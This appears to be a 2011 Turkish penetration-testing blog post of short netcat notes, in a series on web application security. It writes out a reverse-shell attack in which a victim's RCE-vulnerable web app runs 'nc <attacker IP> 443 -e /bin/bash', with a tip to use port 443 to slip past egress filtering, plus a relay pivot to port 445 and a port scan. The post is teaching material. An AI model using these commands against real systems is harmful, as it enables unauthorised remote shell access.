- "netcat" ya da "nc" komutu
- Portu açar = Portu dinlemeye alan bir uygulama çalıştırır.
- DNS Cat ==> İncele!
- Dinleme modu: $nc 10.1.1.5 99 (nc <ip> <port>)
- Sunucu modu: nc -l -p 99 (99. portu dinlemeye aç)
- Senaryo:
- Kurban makinede RCE (remote code execution) zafiyeti olan bir web uygulaması var.
- Saldırgan tarafında sunucu başlat ==> nc -l -p 443
- Kurban makinedeki web uygulamasında ==> nc <saldırganRealIP> 443 -e /bin/bash
- Senaryoda saldırgan makinenin NAT arkasında olmadığı düşünülüyor.
- Kurban makinede dışarı çıkış izni olan bir port kullanmak lazım. Senaryoda bu nedenle 443 portu kullanılıyor; https için kullanılan port; genelde dışarı doğru açık olur.
- Bir makine üzerinden başka bir makine ele geçirme ==> $nc -l -p 80 | nc 5.5.5.6 445
- NetCat ile port tarama ==> nc -z -v <IP-aralığı>
Önceleri web uygulama güvenliğine özel olması düşünülen blog, daha sonra diğer sızma testleri konularını da kapsayacak şekilde genişletilmiştir.
6 Temmuz 2011 Çarşamba
Pentest in Practice - VI: NetCat
NetCat
Kaydol:
Kayıt Yorumları (Atom)
Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
& (%26) URL sorgu tümcesindeki parametreleri mesaj gövdesinden ayırmada kullanılır. = (%3d) URL sorgu tümcesindeki parametrelerin i...
-
Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....
-
OWASP'ın 2010 yılı için açıkladığı en önemli 10 güvenlik riski ve bunlar için en faydalı araçlardan birer örnek, bu yazının konusunu ol...
Hiç yorum yok:
Yorum Gönder